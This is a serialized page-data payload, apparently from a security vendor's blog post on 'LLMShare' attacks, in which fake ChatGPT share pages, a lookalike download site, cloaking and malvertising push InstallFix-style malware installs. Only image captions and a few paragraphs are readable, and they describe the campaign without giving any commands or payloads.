,{"target":8472},{"sys":8473},{"id":6889,"type":1001,"linkType":1002},[],{"data":8476,"content":8477,"nodeType":860},{},[8478,8481,8487,8490,8496,8499,8506],{"data":8479,"marks":8480,"value":6897,"nodeType":864},{},[],{"data":8482,"content":8483,"nodeType":883},{"uri":6900},[8484],{"data":8485,"marks":8486,"value":6905,"nodeType":864},{},[],{"data":8488,"marks":8489,"value":6909,"nodeType":864},{},[],{"data":8491,"content":8492,"nodeType":883},{"uri":6912},[8493],{"data":8494,"marks":8495,"value":6917,"nodeType":864},{},[],{"data":8497,"marks":8498,"value":902,"nodeType":864},{},[],{"data":8500,"content":8501,"nodeType":883},{"uri":6923},[8502],{"data":8503,"marks":8504,"value":6929,"nodeType":864},{},[8505],{"type":1455},{"data":8507,"marks":8508,"value":6933,"nodeType":864},{},[],{"data":8510,"content":8511,"nodeType":860},{},[8512],{"data":8513,"marks":8514,"value":6940,"nodeType":864},{},[],{"data":8516,"content":8517,"nodeType":1005},{},[],{"data":8519,"content":8520,"nodeType":1009},{},[8521],{"data":8522,"marks":8523,"value":6951,"nodeType":864},{},[8524],{"type":899},{"data":8526,"content":8527,"nodeType":860},{},[8528],{"data":8529,"marks":8530,"value":6958,"nodeType":864},{},[],{"data":8532,"content":8533,"nodeType":1312},{},[8534],{"data":8535,"marks":8536,"value":6965,"nodeType":864},{},[],{"data":8538,"content":8539,"nodeType":860},{},[8540,8543,8549,8552,8558,8561,8567],{"data":8541,"marks":8542,"value":6972,"nodeType":864},{},[],{"data":8544,"content":8545,"nodeType":883},{"uri":6975},[8546],{"data":8547,"marks":8548,"value":6980,"nodeType":864},{},[],{"data":8550,"marks":8551,"value":6984,"nodeType":864},{},[],{"data":8553,"content":8554,"nodeType":883},{"uri":6987},[8555],{"data":8556,"marks":8557,"value":6992,"nodeType":864},{},[],{"data":8559,"marks":8560,"value":6996,"nodeType":864},{},[],{"data":8562,"content":8563,"nodeType":883},{"uri":6999},[8564],{"data":8565,"marks":8566,"value":7004,"nodeType":864},{},[],{"data":8568,"marks":8569,"value":7008,"nodeType":864},{},[],{"data":8571,"content":8572,"nodeType":1312},{},[8573],{"data":8574,"marks":8575,"value":7015,"nodeType":864},{},[],{"data":8577,"content":8578,"nodeType":860},{},[8579,8582,8588,8591,8597],{"data":8580,"marks":8581,"value":7022,"nodeType":864},{},[],{"data":8583,"content":8584,"nodeType":883},{"uri":7025},[8585],{"data":8586,"marks":8587,"value":7030,"nodeType":864},{},[],{"data":8589,"marks":8590,"value":7034,"nodeType":864},{},[],{"data":8592,"content":8593,"nodeType":883},{"uri":7037},[8594],{"data":8595,"marks":8596,"value":7042,"nodeType":864},{},[],{"data":8598,"marks":8599,"value":7046,"nodeType":864},{},[],{"data":8601,"content":8602,"nodeType":1312},{},[8603],{"data":8604,"marks":8605,"value":7053,"nodeType":864},{},[],{"data":8607,"content":8608,"nodeType":860},{},[8609,8612,8618,8621,8627,8630,8636],{"data":8610,"marks":8611,"value":7060,"nodeType":864},{},[],{"data":8613,"content":8614,"nodeType":883},{"uri":7063},[8615],{"data":8616,"marks":8617,"value":7068,"nodeType":864},{},[],{"data":8619,"marks":8620,"value":7072,"nodeType":864},{},[],{"data":8622,"content":8623,"nodeType":883},{"uri":7075},[8624],{"data":8625,"marks":8626,"value":7080,"nodeType":864},{},[],{"data":8628,"marks":8629,"value":7084,"nodeType":864},{},[],{"data":8631,"content":8632,"nodeType":883},{"uri":7087},[8633],{"data":8634,"marks":8635,"value":7092,"nodeType":864},{},[],{"data":8637,"marks":8638,"value":7096,"nodeType":864},{},[],{"data":8640,"content":8641,"nodeType":860},{},[8642],{"data":8643,"marks":8644,"value":7103,"nodeType":864},{},[],{"data":8646,"content":8647,"nodeType":1005},{},[],{"data":8649,"content":8650,"nodeType":1009},{},[8651],{"data":8652,"marks":8653,"value":7114,"nodeType":864},{},[8654],{"type":899},{"data":8656,"content":8657,"nodeType":860},{},[8658,8661,8667],{"data":8659,"marks":8660,"value":7121,"nodeType":864},{},[],{"data":8662,"content":8663,"nodeType":883},{"uri":7124},[8664],{"data":8665,"marks":8666,"value":7129,"nodeType":864},{},[],{"data":8668,"marks":8669,"value":7133,"nodeType":864},{},[],{"data":8671,"content":8672,"nodeType":860},{},[8673],{"data":8674,"marks":8675,"value":7140,"nodeType":864},{},[],{"data":8677,"content":8678,"nodeType":1312},{},[8679],{"data":8680,"marks":8681,"value":7148,"nodeType":864},{},[8682],{"type":899},{"data":8684,"content":8685,"nodeType":860},{},[8686,8689,8693],{"data":8687,"marks":8688,"value":7155,"nodeType":864},{},[],{"data":8690,"marks":8691,"value":1555,"nodeType":864},{},[8692],{"type":899},{"data":8694,"marks":8695,"value":7163,"nodeType":864},{},[],{"data":8697,"content":8698,"nodeType":860},{},[8699],{"data":8700,"marks":8701,"value":7170,"nodeType":864},{},[],{"data":8703,"content":8704,"nodeType":860},{},[8705,8708,8714],{"data":8706,"marks":8707,"value":7177,"nodeType":864},{},[],{"data":8709,"content":8710,"nodeType":883},{"uri":7180},[8711],{"data":8712,"marks":8713,"value":7185,"nodeType":864},{},[],{"data":8715,"marks":8716,"value":7189,"nodeType":864},{},[],{"data":8718,"content":8719,"nodeType":860},{},[8720],{"data":8721,"marks":8722,"value":7196,"nodeType":864},{},[],{"data":8724,"content":8725,"nodeType":1005},{},[],{"data":8727,"content":8728,"nodeType":860},{},[8729],{"data":8730,"marks":8731,"value":1682,"nodeType":864},{},[],{"data":8733,"content":8734,"nodeType":860},{},[8735],{"data":8736,"marks":8737,"value":1689,"nodeType":864},{},[],{"data":8739,"content":8740,"nodeType":860},{},[8741,8744,8751],{"data":8742,"marks":8743,"value":21,"nodeType":864},{},[],{"data":8745,"content":8746,"nodeType":883},{"uri":5642},[8747],{"data":8748,"marks":8749,"value":1703,"nodeType":864},{},[8750],{"type":1455},{"data":8752,"marks":8753,"value":21,"nodeType":864},{},[],{"data":8755,"content":8756,"nodeType":1005},{},[],{"data":8758,"content":8759,"nodeType":1009},{},[8760],{"data":8761,"marks":8762,"value":7238,"nodeType":864},{},[8763],{"type":899},{"data":8765,"content":8766,"nodeType":860},{},[8767,8770,8776],{"data":8768,"marks":8769,"value":7245,"nodeType":864},{},[],{"data":8771,"content":8772,"nodeType":883},{"uri":7248},[8773],{"data":8774,"marks":8775,"value":7253,"nodeType":864},{},[],{"data":8777,"marks":8778,"value":7257,"nodeType":864},{},[],{"data":8780,"content":8781,"nodeType":860},{},[8782],{"data":8783,"marks":8784,"value":7264,"nodeType":864},{},[],{"data":8786,"content":8787,"nodeType":4845},{},[8788,8811,8832,8853,8874],{"data":8789,"content":8790,"nodeType":4581},{},[8791,8801],{"data":8792,"content":8793,"nodeType":7282},{},[8794],{"data":8795,"content":8796,"nodeType":860},{},[8797],{"data":8798,"marks":8799,"value":7281,"nodeType":864},{},[8800],{"type":899},{"data":8802,"content":8803,"nodeType":7282},{},[8804],{"data":8805,"content":8806,"nodeType":860},{},[8807],{"data":8808,"marks":8809,"value":7293,"nodeType":864},{},[8810],{"type":899},{"data":8812,"content":8813,"nodeType":4581},{},[8814,8823],{"data":8815,"content":8816,"nodeType":4569},{},[8817],{"data":8818,"content":8819,"nodeType":860},{},[8820],{"data":8821,"marks":8822,"value":7306,"nodeType":864},{},[],{"data":8824,"content":8825,"nodeType":4569},{},[8826],{"data":8827,"content":8828,"nodeType":860},{},[8829],{"data":8830,"marks":8831,"value":7316,"nodeType":864},{},[],{"data":8833,"content":8834,"nodeType":4581},{},[8835,8844],{"data":8836,"content":8837,"nodeType":4569},{},[8838],{"data":8839,"content":8840,"nodeType":860},{},[8841],{"data":8842,"marks":8843,"value":7329,"nodeType":864},{},[],{"data":8845,"content":8846,"nodeType":4569},{},[8847],{"data":8848,"content":8849,"nodeType":860},{},[8850],{"data":8851,"marks":8852,"value":7316,"nodeType":864},{},[],{"data":8854,"content":8855,"nodeType":4581},{},[8856,8865],{"data":8857,"content":8858,"nodeType":4569},{},[8859],{"data":8860,"content":8861,"nodeType":860},{},[8862],{"data":8863,"marks":8864,"value":7351,"nodeType":864},{},[],{"data":8866,"content":8867,"nodeType":4569},{},[8868],{"data":8869,"content":8870,"nodeType":860},{},[8871],{"data":8872,"marks":8873,"value":7361,"nodeType":864},{},[],{"data":8875,"content":8876,"nodeType":4581},{},[8877,8886],{"data":8878,"content":8879,"nodeType":4569},{},[8880],{"data":8881,"content":8882,"nodeType":860},{},[8883],{"data":8884,"marks":8885,"value":7374,"nodeType":864},{},[],{"data":8887,"content":8888,"nodeType":4569},{},[8889],{"data":8890,"content":8891,"nodeType":860},{},[8892],{"data":8893,"marks":8894,"value":7384,"nodeType":864},{},[],{"data":8896,"content":8897,"nodeType":860},{},[8898],{"data":8899,"marks":8900,"value":21,"nodeType":864},{},[],{"entries":8902},{"hyperlink":8903,"inline":8904,"block":8905},[],[],[8906,8911,8936,8943,8950,8957,8964,8972,8979,8987],{"sys":8907,"__typename":1724,"title":8908,"caption":59,"layoutMode":59,"file":8909},{"id":6664},"LLMShare pages side by side",{"url":8910,"width":1736,"height":5709},"https://images.ctfassets.net/y1cdw1ablpvd/7u7yyvyg3P9jepZi7iIwxf/d2c42d257d2e7ac4dfe28c37aa69a4b3/image4.png",{"sys":8912,"__typename":1740,"content":8913,"name":8935,"title":59},{"id":6670},{"json":8914},{"nodeType":856,"data":8915,"content":8916},{},[8917],{"nodeType":860,"data":8918,"content":8919},{},[8920,8924,8931],{"nodeType":864,"value":8921,"marks":8922,"data":8923},"These are essentially InstallFix attacks — a variant of the ClickFix family that ",[],{},{"nodeType":883,"data":8925,"content":8926},{"uri":6024},[8927],{"nodeType":864,"value":8928,"marks":8929,"data":8930},"Push documented earlier this year",[],{},{"nodeType":864,"value":8932,"marks":8933,"data":8934}," — and they exploit the fact that AI tools have normalized command-line installation workflows for a population of users who lack the experience to distinguish a legitimate terminal command from a malicious one. ",[],{},"LLMShare IB1",{"sys":8937,"__typename":1724,"title":8938,"caption":8939,"layoutMode":59,"file":8940},{"id":6722},"LLMShare error page","The fake \"high traffic\" page rendered inside a ChatGPT shared content URL. Note the \"Show code\" and \"Remix with ChatGPT\" buttons at the top, which reveal that this is actually rendered HTML/CSS code rather than a real ChatGPT system page.",{"url":8941,"width":1736,"height":8942},"https://images.ctfassets.net/y1cdw1ablpvd/soQtEPyX9aQUfby2Ylm7m/0bb772950b7e3598a343f1609a955ed4/image3.png",1750,{"sys":8944,"__typename":1724,"title":8945,"caption":8946,"layoutMode":59,"file":8947},{"id":6742},"LLMShare panel showing source code","The same page with the code panel open, showing the HTML/CSS source code that generates the fake service disruption notice.",{"url":8948,"width":1736,"height":8949},"https://images.ctfassets.net/y1cdw1ablpvd/22IO2J68rUGy5ZzEAGfFIh/ff98ca14ed74de0c35e5154c43aa1524/image7.png",1128,{"sys":8951,"__typename":1724,"title":8952,"caption":8953,"layoutMode":59,"file":8954},{"id":6766},"LLMShare page with download panel","The fake ChatGPT download page hosted at openew[.]app. The design closely replicates OpenAI's legitimate download page.",{"url":8955,"width":1736,"height":8956},"https://images.ctfassets.net/y1cdw1ablpvd/4woFKeexapLYHfpKfCzEbo/8b7fc45a933af8fea5f6bce97823e123/image2.png",1210,{"sys":8958,"__typename":1724,"title":8959,"caption":8960,"layoutMode":59,"file":8961},{"id":6772},"Real ChatGPT download page for comparison at chatgpt.com/download.","Real ChatGPT download page for comparison chatgpt.com/download.",{"url":8962,"width":1736,"height":8963},"https://images.ctfassets.net/y1cdw1ablpvd/3hHpXRmxJyRPs4y1SQbHMM/67e33342db5ecb1e3928bb8e1a56749a/image5.png",1142,{"sys":8965,"__typename":1724,"title":8966,"caption":8967,"layoutMode":59,"file":8968},{"id":6810},"Alternative LLMShare page for bot visitors","What URLScan sees when visiting the same openew[.]app URL: a generic \"Openew\" AR/VR company website with no trace of the ChatGPT impersonation.",{"url":8969,"width":8970,"height":8971},"https://images.ctfassets.net/y1cdw1ablpvd/apMKHaMjDF9GmoCO1gVHT/c25938faf56bb96b467469209470e40c/image1.png",1600,1200,{"sys":8973,"__typename":1724,"title":8974,"caption":8974,"layoutMode":59,"file":8975},{"id":6845},"A shared Claude.ai conversation containing malicious installation instructions in the style previously reported by BleepingComputer.",{"url":8976,"width":8977,"height":8978},"https://images.ctfassets.net/y1cdw1ablpvd/2YLf3kEK2y2XjdyM1Q9uRT/6b5774de9708ff8544889305a094d991/image6.png",1920,945,{"sys":8980,"__typename":1724,"title":8981,"caption":8982,"layoutMode":59,"file":8983},{"id":6883},"LLMShare malvertising","The LLMShare ad uses the legitimate ChatGPT domain and is the top result.",{"url":8984,"width":8985,"height":8986},"https://images.ctfassets.net/y1cdw1ablpvd/1aLEhiVJcLPIR4rXdzoCTv/d87eb30284e61ab813ccf9e662a1fbae/image.png",1910,1005,{"sys":8988,"__typename":1740,"content":8989,"name":9024,"title":59},{"id":6889},{"json":8990},{"nodeType":856,"data":8991,"content":8992},{},[8993,9004],{"nodeType":860,"data":8994,"content":8995},{},[8996,9000],{"nodeType":864,"value":8997,"marks":8998,"data":8999},"Although we managed to grab that example, the ads haven't been easy to reproduce.",[],{},{"nodeType":864,"value":9001,"marks":9002,"data":9003}," This is because the ads are likely geographically or temporally scoped. It’s pretty eye-opening (and creepy) how tightly scoped these kinds of sponsored ads can be across different platforms. ",[],{},{"nodeType":860,"data":9005,"content":9006},{},[9007,9011,9020],{"nodeType":864,"value":9008,"marks":9009,"data":9010},"This is one of the key misconceptions people can have about this kind of attack. It’s easy to see it as untargeted, when realistically it can be scoped tightly to a desired victim population by role, geography, and so on. We’ve written about this previously in ",[],{},{"nodeType":883,"data":9012,"content":9014},{"uri":9013},"https://pushsecurity.com/blog/cyber-criminal-ecosystem-analysis/",[9015],{"nodeType":864,"value":9016,"marks":9017,"data":9019},"our blog",[9018],{"type":1455},{},{"nodeType":864,"value":9021,"marks":9022,"data":9023}," on the ad account takeover > malvertising ecosystem. ",[],{},"LLMShare IB2",{"items":9026},[],{},"LLMShare: using shared chatbot pages to distribute malware",{"items":9030},[9031,9752,10777],{"__typename":2059,"sys":9032,"content":9033,"title":6584,"synopsis":6585,"hashTags":59,"publishedDate":6586,"slug":6587,"tagsCollection":9742,"authorsCollection":9748},{"id":5746},{"json":9034},{"data":9035,"content":9036,"nodeType":856},{},[9037,9052,9067,9082,9087,9090,9097,9103,9109,9115,9121,9128,9131,9138,9144,9150,9156,9161,9168,9183,9189,9195,9208,9215,9239,9252,9258,9282,9289,9313,9319,9326,9341,9347,9353,9358,9364,9371,9386,9392,9408,9414,9417,9424,9430,9505,9511,9524,9527,9552,9567,9573,9579,9582,9589,9604,9610,9616,9631,9634,9641,9647,9677,9683,9698,9713,9718,9721,9727],{"data":9038,"content":9039,"nodeType":860},{},[9040,9043,9049],{"data":9041,"marks":9042,"value":5757,"nodeType":864},{},[],{"data":9044,"content":9045,"nodeType":883},{"uri":5760},[9046],{"data":9047,"marks":9048,"value":5765,"nodeType":864},{},[],{"data":9050,"marks":9051,"value":5769,"nodeType":864},{},[],{"data":9053,"content":9054,"nodeType":860},{},[9055,9058,9064],{"data":9056,"marks":9057,"value":5776,"nodeType":864},{},[],{"data":9059,"content":9060,"nodeType":883},{"uri":5779},[9061],{"data":9062,"marks":9063,"value":5784,"nodeType":864},{},[],{"data":9065,"marks":9066,"value":5788,"nodeType":864},{},[],{"data":9068,"content":9069,"nodeType":860},{},[9070,9073,9079],{"data":9071,"marks":9072,"value":5795,"nodeType":864},{},[],{"data":9074,"content":9075,"nodeType":883},{"uri":5243},[9076],{"data":9077,"marks":9078,"value":5248,"nodeType":864},{},[],{"data":9080,"marks":9081,"value":5805,"nodeType":864},{},[],{"data":9083,"content":9086,"nodeType":996},{"target":9084},{"sys":9085},{"id":5810,"type":1001,"linkType":1002},[],{"data":9088,"content":9089,"nodeType":1005},{},[],{"data":9091,"content":9092,"nodeType":1009},{},[9093],{"data":9094,"marks":9095,"value":5822,"nodeType":864},{},[9096],{"type":899},{"data":9098,"content":9099,"nodeType":860},{},[9100],{"data":9101,"marks":9102,"value":5829,"nodeType":864},{},[],{"data":9104,"content":9105,"nodeType":860},{},[9106],{"data":9107,"marks":9108,"value":5836,"nodeType":864},{},[],{"data":9110,"content":9111,"nodeType":860},{},[9112],{"data":9113,"marks":9114,"value":5843,"nodeType":864},{},[],{"data":9116,"content":9117,"nodeType":860},{},[9118],{"data":9119,"marks":9120,"value":5850,"nodeType":864},{},[],{"data":9122,"content":9123,"nodeType":860},{},[9124],{"data":9125,"marks":9126,"value":5858,"nodeType":864},{},[9127],{"type":899},{"data":9129,"content":9130,"nodeType":1005},{},[],{"data":9132,"content":9133,"nodeType":1009},{},[9134],{"data":9135,"marks":9136,"value":5869,"nodeType":864},{},[9137],{"type":899},{"data":9139,"content":9140,"nodeType":860},{},[9141],{"data":9142,"marks":9143,"value":5876,"nodeType":864},{},[],{"data":9145,"content":9146,"nodeType":860},{},[9147],{"data":9148,"marks":9149,"value":5883,"nodeType":864},{},[],{"data":9151,"content":9152,"nodeType":860},{},[9153],{"data":9154,"marks":9155,"value":5890,"nodeType":864},{},[],{"data":9157,"content":9160,"nodeType":996},{"target":9158},{"sys":9159},{"id":5895,"type":1001,"linkType":1002},[],{"data":9162,"content":9163,"nodeType":1312},{},[9164],{"data":9165,"marks":9166,"value":5904,"nodeType":864},{},[9167],{"type":899},{"data":9169,"content":9170,"nodeType":860},{},[9171,9174,9180],{"data":9172,"marks":9173,"value":5911,"nodeType":864},{},[],{"data":9175,"content":9176,"nodeType":883},{"uri":5914},[9177],{"data":9178,"marks":9179,"value":5919,"nodeType":864},{},[],{"data":9181,"marks":9182,"value":5923,"nodeType":864},{},[],{"data":9184,"content":9185,"nodeType":860},{},[9186],{"data":9187,"marks":9188,"value":5930,"nodeType":864},{},[],{"data":9190,"content":9191,"nodeType":860},{},[9192],{"data":9193,"marks":9194,"value":5937,"nodeType":864},{},[],{"data":9196,"content":9197,"nodeType":860},{},[9198,9201,9205],{"data":9199,"marks":9200,"value":5944,"nodeType":864},{},[],{"data":9202,"marks":9203,"value":5949,"nodeType":864},{},[9204],{"type":899},{"data":9206,"marks":9207,"value":5953,"nodeType":864},{},[],{"data":9209,"content":9210,"nodeType":1312},{},[9211],{"data":9212,"marks":9213,"value":5961,"nodeType":864},{},[9214],{"type":899},{"data":9216,"content":9217,"nodeType":860},{},[9218,9221,9227,9230,9236],{"data":9219,"marks":9220,"value":5968,"nodeType":864},{},[],{"data":9222,"content":9223,"nodeType":883},{"uri":5971},[9224],{"data":9225,"marks":9226,"value":5976,"nodeType":864},{},[],{"data":9228,"marks":9229,"value":5980,"nodeType":864},{},[],{"data":9231,"content":9232,"nodeType":883},{"uri":3237},[9233],{"data":9234,"marks":9235,"value":5987,"nodeType":864},{},[],{"data":9237,"marks":9238,"value":5991,"nodeType":864},{},[],{"data":9240,"content":9241,"nodeType":860},{},[9242,9245,9249],{"data":9243,"marks":9244,"value":5998,"nodeType":864},{},[],{"data":9246,"marks":9247,"value":6003,"nodeType":864},{},[9248],{"type":899},{"data":9250,"marks":9251,"value":6007,"nodeType":864},{},[],{"data":9253,"content":9254,"nodeType":860},{},[9255],{"data":9256,"marks":9257,"value":6014,"nodeType":864},{},[],{"data":9259,"content":9260,"nodeType":860},{},[9261,9264,9270,9273,9279],{"data":9262,"marks":9263,"value":6021,"nodeType":864},{},[],{"data":9265,"content":9266,"nodeType":883},{"uri":6024},[9267],{"data":9268,"marks":9269,"value":6029,"nodeType":864},{},[],{"data":9271,"marks":9272,"value":6033,"nodeType":864},{},[],{"data":9274,"content":9275,"nodeType":883},{"uri":6036},[9276],{"data":9277,"marks":9278,"value":6041,"nodeType":864},{},[],{"data":9280,"marks":9281,"value":6045,"nodeType":864},{},[],{"data":9283,"content":9284,"nodeType":1312},{},[9285],{"data":9286,"marks":9287,"value":6053,"nodeType":864},{},[9288],{"type":899},{"data":9290,"content":9291,"nodeType":860},{},[9292,9295,9301,9304,9310],{"data":9293,"marks":9294,"value":6060,"nodeType":864},{},[],{"data":9296,"content":9297,"nodeType":883},{"uri":6063},[9298],{"data":9299,"marks":9300,"value":6068,"nodeType":864},{},[],{"data":9302,"marks":9303,"value":6072,"nodeType":864},{},[],{"data":9305,"content":9306,"nodeType":883},{"uri":6075},[9307],{"data":9308,"marks":9309,"value":6080,"nodeType":864},{},[],{"data":9311,"marks":9312,"value":6084,"nodeType":864},{},[],{"data":9314,"content":9315,"nodeType":860},{},[9316],{"data":9317,"marks":9318,"value":6091,"nodeType":864},{},[],{"data":9320,"content":9321,"nodeType":1312},{},[9322],{"data":9323,"marks":9324,"value":6099,"nodeType":864},{},[9325],{"type":899},{"data":9327,"content":9328,"nodeType":860},{},[9329,9332,9338],{"data":9330,"marks":9331,"value":6106,"nodeType":864},{},[],{"data":9333,"content":9334,"nodeType":883},{"uri":3259},[9335],{"data":9336,"marks":9337,"value":6113,"nodeType":864},{},[],{"data":9339,"marks":9340,"value":6117,"nodeType":864},{},[],{"data":9342,"content":9343,"nodeType":860},{},[9344],{"data":9345,"marks":9346,"value":6124,"nodeType":864},{},[],{"data":9348,"content":9349,"nodeType":860},{},[9350],{"data":9351,"marks":9352,"value":6131,"nodeType":864},{},[],{"data":9354,"content":9357,"nodeType":996},{"target":9355},{"sys":9356},{"id":6136,"type":1001,"linkType":1002},[],{"data":9359,"content":9360,"nodeType":860},{},[9361],{"data":9362,"marks":9363,"value":6144,"nodeType":864},{},[],{"data":9365,"content":9366,"nodeType":1312},{},[9367],{"data":9368,"marks":9369,"value":6152,"nodeType":864},{},[9370],{"type":899},{"data":9372,"content":9373,"nodeType":860},{},[9374,9377,9383],{"data":9375,"marks":9376,"value":6159,"nodeType":864},{},[],{"data":9378,"content":9379,"nodeType":883},{"uri":2411},[9380],{"data":9381,"marks":9382,"value":6166,"nodeType":864},{},[],{"data":9384,"marks":9385,"value":6170,"nodeType":864},{},[],{"data":9387,"content":9388,"nodeType":860},{},[9389],{"data":9390,"marks":9391,"value":6177,"nodeType":864},{},[],{"data":9393,"content":9394,"nodeType":860},{},[9395,9398,9405],{"data":9396,"marks":9397,"value":6184,"nodeType":864},{},[],{"data":9399,"content":9400,"nodeType":883},{"uri":2411},[9401],{"data":9402,"marks":9403,"value":6192,"nodeType":864},{},[9404],{"type":1455},{"data":9406,"marks":9407,"value":6196,"nodeType":864},{},[],{"data":9409,"content":9410,"nodeType":860},{},[9411],{"data":9412,"marks":9413,"value":6203,"nodeType":864},{},[],{"data":9415,"content":9416,"nodeType":1005},{},[],{"data":9418,"content":9419,"nodeType":1009},{},[9420],{"data":9421,"marks":9422,"value":6214,"nodeType":864},{},[9423],{"type":899},{"data":9425,"content":9426,"nodeType":860},{},[9427],{"data":9428,"marks":9429,"value":6221,"nodeType":864},{},[],{"data":9431,"content":9432,"nodeType":941},{},[9433,9451,9469,9487],{"data":9434,"content":9435,"nodeType":945},{},[9436],{"data":9437,"content":9438,"nodeType":860},{},[9439,9442,9448],{"data":9440,"marks":9441,"value":6234,"nodeType":864},{},[],{"data":9443,"content":9444,"nodeType":883},{"uri":6237},[9445],{"data":9446,"marks":9447,"value":6242,"nodeType":864},{},[],{"data":9449,"marks":9450,"value":6246,"nodeType":864},{},[],{"data":9452,"content":9453,"nodeType":945},{},[9454],{"data":9455,"content":9456,"nodeType":860},{},[9457,9460,9466],{"data":9458,"marks":9459,"value":6256,"nodeType":864},{},[],{"data":9461,"content":9462,"nodeType":883},{"uri":6259},[9463],{"data":9464,"marks":9465,"value":6264,"nodeType":864},{},[],{"data":9467,"marks":9468,"value":6268,"nodeType":864},{},[],{"data":9470,"content":9471,"nodeType":945},{},[9472],{"data":9473,"content":9474,"nodeType":860},{},[9475,9478,9484],{"data":9476,"marks":9477,"value":6234,"nodeType":864},{},[],{"data":9479,"content":9480,"nodeType":883},{"uri":6036},[9481],{"data":9482,"marks":9483,"value":6284,"nodeType":864},{},[],{"data":9485,"marks":9486,"value":6288,"nodeType":864},{},[],{"data":9488,"content":9489,"nodeType":945},{},[9490],{"data":9491,"content":9492,"nodeType":860},{},[9493,9496,9502],{"data":9494,"marks":9495,"value":2761,"nodeType":864},{},[],{"data":9497,"content":9498,"nodeType":883},{"uri":6300},[9499],{"data":9500,"marks":9501,"value":3756,"nodeType":864},{},[],{"data":9503,"marks":9504,"value":6308,"nodeType":864},{},[],{"data":9506,"content":9507,"nodeType":860},{},[9508],{"data":9509,"marks":9510,"value":6315,"nodeType":864},{},[],{"data":9512,"content":9513,"nodeType":860},{},[9514,9517,9521],{"data":9515,"marks":9516,"value":6322,"nodeType":864},{},[],{"data":9518,"marks":9519,"value":6327,"nodeType":864},{},[9520],{"type":899},{"data":9522,"marks":9523,"value":6331,"nodeType":864},{},[],{"data":9525,"content":9526,"nodeType":1005},{},[],{"data":9528,"content":9529,"nodeType":1009},{},[9530,9534,9539,9543,9548],{"data":9531,"marks":9532,"value":6342,"nodeType":864},{},[9533],{"type":899},{"data":9535,"marks":9536,"value":6348,"nodeType":864},{},[9537,9538],{"type":2246},{"type":899},{"data":9540,"marks":9541,"value":6353,"nodeType":864},{},[9542],{"type":899},{"data":9544,"marks":9545,"value":6359,"nodeType":864},{},[9546,9547],{"type":2246},{"type":899},{"data":9549,"marks":9550,"value":6364,"nodeType":864},{},[9551],{"type":899},{"data":9553,"content":9554,"nodeType":860},{},[9555,9558,9564],{"data":9556,"marks":9557,"value":6371,"nodeType":864},{},[],{"data":9559,"content":9560,"nodeType":883},{"uri":6374},[9561],{"data":9562,"marks":9563,"value":6379,"nodeType":864},{},[],{"data":9565,"marks":9566,"value":6383,"nodeType":864},{},[],{"data":9568,"content":9569,"nodeType":860},{},[9570],{"data":9571,"marks":9572,"value":6390,"nodeType":864},{},[],{"data":9574,"content":9575,"nodeType":860},{},[9576],{"data":9577,"marks":9578,"value":6397,"nodeType":864},{},[],{"data":9580,"content":9581,"nodeType":1005},{},[],{"data":9583,"content":9584,"nodeType":1009},{},[9585],{"data":9586,"marks":9587,"value":6408,"nodeType":864},{},[9588],{"type":899},{"data":9590,"content":9591,"nodeType":860},{},[9592,9595,9601],{"data":9593,"marks":9594,"value":6415,"nodeType":864},{},[],{"data":9596,"content":9597,"nodeType":883},{"uri":6418},[9598],{"data":9599,"marks":9600,"value":6423,"nodeType":864},{},[],{"data":9602,"marks":9603,"value":6427,"nodeType":864},{},[],{"data":9605,"content":9606,"nodeType":860},{},[9607],{"data":9608,"marks":9609,"value":6434,"nodeType":864},{},[],{"data":9611,"content":9612,"nodeType":860},{},[9613],{"data":9614,"marks":9615,"value":6441,"nodeType":864},{},[],{"data":9617,"content":9618,"nodeType":860},{},[9619,9622,9628],{"data":9620,"marks":9621,"value":6448,"nodeType":864},{},[],{"data":9623,"content":9624,"nodeType":883},{"uri":6451},[9625],{"data":9626,"marks":9627,"value":6423,"nodeType":864},{},[],{"data":9629,"marks":9630,"value":2924,"nodeType":864},{},[],{"data":9632,"content":9633,"nodeType":1005},{},[],{"data":9635,"content":9636,"nodeType":1009},{},[9637],{"data":9638,"marks":9639,"value":6469,"nodeType":864},{},[9640],{"type":899},{"data":9642,"content":9643,"nodeType":860},{},[9644],{"data":9645,"marks":9646,"value":6476,"nodeType":864},{},[],{"data":9648,"content":9649,"nodeType":941},{},[9650,9659,9668],{"data":9651,"content":9652,"nodeType":945},{},[9653],{"data":9654,"content":9655,"nodeType":860},{},[9656],{"data":9657,"marks":9658,"value":6489,"nodeType":864},{},[],{"data":9660,"content":9661,"nodeType":945},{},[9662],{"data":9663,"content":9664,"nodeType":860},{},[9665],{"data":9666,"marks":9667,"value":6499,"nodeType":864},{},[],{"data":9669,"content":9670,"nodeType":945},{},[9671],{"data":9672,"content":9673,"nodeType":860},{},[9674],{"data":9675,"marks":9676,"value":6509,"nodeType":864},{},[],{"data":9678,"content":9679,"nodeType":860},{},[9680],{"data":9681,"marks":9682,"value":6516,"nodeType":864},{},[],{"data":9684,"content":9685,"nodeType":860},{},[9686,9689,9695],{"data":9687,"marks":9688,"value":6523,"nodeType":864},{},[],{"data":9690,"content":9691,"nodeType":883},{"uri":5243},[9692],{"data":9693,"marks":9694,"value":6530,"nodeType":864},{},[],{"data":9696,"marks":9697,"value":2924,"nodeType":864},{},[],{"data":9699,"content":9700,"nodeType":860},{},[9701,9704,9710],{"data":9702,"marks":9703,"value":6540,"nodeType":864},{},[],{"data":9705,"content":9706,"nodeType":883},{"uri":6543},[9707],{"data":9708,"marks":9709,"value":6548,"nodeType":864},{},[],{"data":9711,"marks":9712,"value":6552,"nodeType":864},{},[],{"data":9714,"content":9717,"nodeType":996},{"target":9715},{"sys":9716},{"id":6557,"type":1001,"linkType":1002},[],{"data":9719,"content":9720,"nodeType":1005},{},[],{"data":9722,"content":9723,"nodeType":860},{},[9724],{"data":9725,"marks":9726,"value":6568,"nodeType":864},{},[],{"data":9728,"content":9729,"nodeType":860},{},[9730,9733,9739],{"data":9731,"marks":9732,"value":2707,"nodeType":864},{},[],{"data":9734,"content":9735,"nodeType":883},{"uri":1700},[9736],{"data":9737,"marks":9738,"value":2715,"nodeType":864},{},[],{"data":9740,"marks":9741,"value":2719,"nodeType":864},{},[],{"items":9743},[9744,9746],{"sys":9745,"name":6593},{"id":6592},{"sys":9747,"name":342},{"id":6596},{"items":9749},[9750],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":9751},{"url":2740},{"__typename":2059,"sys":9753,"content":9755,"title":10759,"synopsis":10760,"hashTags":59,"publishedDate":10761,"slug":10762,"tagsCollection":10763,"authorsCollection":10769},{"id":9754},"7bG71Eo43crbIHKzczooVS",{"json":9756},{"data":9757,"content":9758,"nodeType":856},{},[9759,9765,9772,9779,9787,9802,9808,98